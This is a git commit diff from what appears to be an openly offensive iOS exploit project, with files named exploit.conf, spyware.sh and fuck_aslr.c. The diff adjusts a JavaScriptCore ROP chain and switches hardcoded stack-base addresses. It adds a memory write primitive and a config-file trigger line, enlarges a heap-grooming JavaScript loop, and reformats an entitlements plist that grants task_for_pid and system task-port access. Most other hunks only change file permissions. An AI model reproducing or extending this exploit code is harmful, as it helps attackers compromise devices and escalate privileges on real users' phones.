diff options
| author | spv420 <unomilliono@gmail.com> | 2022-04-23 16:23:39 -0400 |
|---|---|---|
| committer | spv420 <unomilliono@gmail.com> | 2022-04-23 16:23:39 -0400 |
| commit | 3dea872119219789ff85daef37f059eefc709871 (patch) | |
| tree | 1ff06b8e1980b034eb9a7b5aa20d29b19780573d | |
| parent | d7cf3795b6da29a8ec7a6b7fc1245b70ff9d3dca (diff) | |
shitdick
| -rw-r--r--[-rwxr-xr-x] | build.sh | 0 | ||||
| -rw-r--r--[-rwxr-xr-x] | build_native.sh | 0 | ||||
| -rw-r--r--[-rwxr-xr-x] | exploit.conf | 0 | ||||
| -rw-r--r--[-rwxr-xr-x] | install.sh | 0 | ||||
| -rw-r--r--[-rwxr-xr-x] | install_native.sh | 0 | ||||
| -rw-r--r-- | js/main.js | 2 | ||||
| -rw-r--r--[-rwxr-xr-x] | spyware.sh | 0 | ||||
| -rw-r--r--[-rwxr-xr-x] | src/common.h | 0 | ||||
| -rw-r--r--[-rwxr-xr-x] | src/ip_tools.c | 0 | ||||
| -rw-r--r--[-rwxr-xr-x] | src/ip_tools.h | 0 | ||||
| -rw-r--r-- | src/main.c | 11 | ||||
| -rw-r--r--[-rwxr-xr-x] | src/patchfinder.h | 0 | ||||
| -rw-r--r--[-rwxr-xr-x] | src/stage0_primitives.c | 0 | ||||
| -rw-r--r--[-rwxr-xr-x] | src/stage0_primitives.h | 0 | ||||
| -rw-r--r--[-rwxr-xr-x] | src/stage1_primitives.c | 0 | ||||
| -rw-r--r--[-rwxr-xr-x] | src/stage1_primitives.h | 0 | ||||
| -rw-r--r--[-rwxr-xr-x] | tools/build.sh | 0 | ||||
| -rw-r--r--[-rwxr-xr-x] | tools/ent.xml | 28 | ||||
| -rw-r--r--[-rwxr-xr-x] | tools/fuck_aslr.c | 0 | ||||
| -rw-r--r--[-rwxr-xr-x] | tools/fuck_ptr.c | 0 | ||||
| -rw-r--r--[-rwxr-xr-x] | tools/jit_all_the_things.c | 0 | ||||
| -rw-r--r--[-rwxr-xr-x] | tools/test.c | 0 |
22 files changed, 22 insertions, 19 deletions
diff --git a/build_native.sh b/build_native.sh index 12ec3b9..12ec3b9 100755..100644 --- a/build_native.sh +++ b/build_native.sh diff --git a/exploit.conf b/exploit.conf index 8bf3bf1..8bf3bf1 100755..100644 --- a/exploit.conf +++ b/exploit.conf diff --git a/install.sh b/install.sh index 3dcfb9c..3dcfb9c 100755..100644 --- a/install.sh +++ b/install.sh diff --git a/install_native.sh b/install_native.sh index 325515a..325515a 100755..100644 --- a/install_native.sh +++ b/install_native.sh @@ -69,7 +69,7 @@ function main() { // call4arg(call4arg(dlsym_addy + shc_slide, 0xfffffffe, 0x149000, 0, 0), 0x28, 0x148000, i, slide); // call4arg(call4arg(dlsym_addy + shc_slide, 0xfffffffe, 0x14a000, 0, 0), 1, 0x1, 0x2, 0x3); calls4arg("syslog\0", 0x28, sptr("get rekt from jsc %d (slide=%x)\n\0"), i, 0); - calls4arg("sleep", 1, 0, 0, 0); +// calls4arg("sleep", 1, 0, 0, 0); i++; // call4arg(call4arg(dlsym_addy + shc_slide, 0xfffffffe, 0x149000, 0, 0), 0x148000, i, 0x2, 0x3); } diff --git a/spyware.sh b/spyware.sh index dac5939..dac5939 100755..100644 --- a/spyware.sh +++ b/spyware.sh diff --git a/src/common.h b/src/common.h index 9550400..9550400 100755..100644 --- a/src/common.h +++ b/src/common.h diff --git a/src/ip_tools.c b/src/ip_tools.c index 6e36b64..6e36b64 100755..100644 --- a/src/ip_tools.c +++ b/src/ip_tools.c diff --git a/src/ip_tools.h b/src/ip_tools.h index a011094..a011094 100755..100644 --- a/src/ip_tools.h +++ b/src/ip_tools.h @@ -202,11 +202,11 @@ int main(int argc, fprintf(fp, "# - with love from spv <3\n"); fprintf(fp, "\n"); -// uint32_t stack_base = 0x1c7738; // my shell setup + uint32_t stack_base = 0x1c7738; // my shell setup // uint32_t stack_base = 0x1c7c88; // my 4s shell setup // uint32_t stack_base = 0x1c2e48; // my lldb // uint32_t stack_base = 0x1c7d68; // btserver env - uint32_t stack_base = 0x1c7dd8; // wifiFirmwareLoader env +// uint32_t stack_base = 0x1c7dd8; // wifiFirmwareLoader env uint32_t magic_trigger_addr = 0xb6074; uint32_t mov_r0_0_bx_lr = 0x8d3e | 1; @@ -286,6 +286,9 @@ int main(int argc, 0x42424242)); #endif + fprintf(fp, "%s\n", write32_unslid(stack_base - 0x948, 0x41414141)); + fprintf(fp, "mode_cfg{dns41.1.1.1;}"); + #if 0 // fprintf(fp, // "%s\n", @@ -334,7 +337,7 @@ int main(int argc, "var parent = new Uint8Array(0x100);" "var child = new Uint8Array(0x100);" " var fuck = new Array();" - " for (var i = 0; i < 0x10000; i++) {" + " for (var i = 0; i < 0x200000; i++) {" " fuck[i] = i;" " }" " delete fuck;" @@ -343,7 +346,7 @@ int main(int argc, strlen("var parent = new Uint8Array(0x100);" "var child = new Uint8Array(0x100);" " var fuck = new Array();" - " for (var i = 0; i < 0x10000; i++) {" + " for (var i = 0; i < 0x200000; i++) {" " fuck[i] = i;" " }" " delete fuck;" diff --git a/src/patchfinder.h b/src/patchfinder.h index 21af7e3..21af7e3 100755..100644 --- a/src/patchfinder.h +++ b/src/patchfinder.h diff --git a/src/stage0_primitives.c b/src/stage0_primitives.c index b54cb1a..b54cb1a 100755..100644 --- a/src/stage0_primitives.c +++ b/src/stage0_primitives.c diff --git a/src/stage0_primitives.h b/src/stage0_primitives.h index a9a71eb..a9a71eb 100755..100644 --- a/src/stage0_primitives.h +++ b/src/stage0_primitives.h diff --git a/src/stage1_primitives.c b/src/stage1_primitives.c index ffe7b53..ffe7b53 100755..100644 --- a/src/stage1_primitives.c +++ b/src/stage1_primitives.c diff --git a/src/stage1_primitives.h b/src/stage1_primitives.h index d6b9c33..d6b9c33 100755..100644 --- a/src/stage1_primitives.h +++ b/src/stage1_primitives.h diff --git a/tools/build.sh b/tools/build.sh index 5baab83..5baab83 100755..100644 --- a/tools/build.sh +++ b/tools/build.sh diff --git a/tools/ent.xml b/tools/ent.xml index 35801e8..2973d1d 100755..100644 --- a/tools/ent.xml +++ b/tools/ent.xml @@ -1,15 +1,15 @@ -<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
-<plist version="1.0">
-<dict>
- <key>platform-application</key>
- <true/>
- <key>com.apple.private.security.no-container</key>
- <true/>
- <key>com.apple.system-task-ports</key>
- <true/>
- <key>task_for_pid-allow</key>
- <true/>
- <key>get-task-allow</key>
- <true/>
-</dict>
+<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> +<plist version="1.0"> +<dict> + <key>platform-application</key> + <true/> + <key>com.apple.private.security.no-container</key> + <true/> + <key>com.apple.system-task-ports</key> + <true/> + <key>task_for_pid-allow</key> + <true/> + <key>get-task-allow</key> + <true/> +</dict> </plist>
\ No newline at end of file diff --git a/tools/fuck_aslr.c b/tools/fuck_aslr.c index c8e9714..c8e9714 100755..100644 --- a/tools/fuck_aslr.c +++ b/tools/fuck_aslr.c diff --git a/tools/fuck_ptr.c b/tools/fuck_ptr.c index 25eab56..25eab56 100755..100644 --- a/tools/fuck_ptr.c +++ b/tools/fuck_ptr.c diff --git a/tools/jit_all_the_things.c b/tools/jit_all_the_things.c index d955ea1..d955ea1 100755..100644 --- a/tools/jit_all_the_things.c +++ b/tools/jit_all_the_things.c diff --git a/tools/test.c b/tools/test.c index 6682971..6682971 100755..100644 --- a/tools/test.c +++ b/tools/test.c |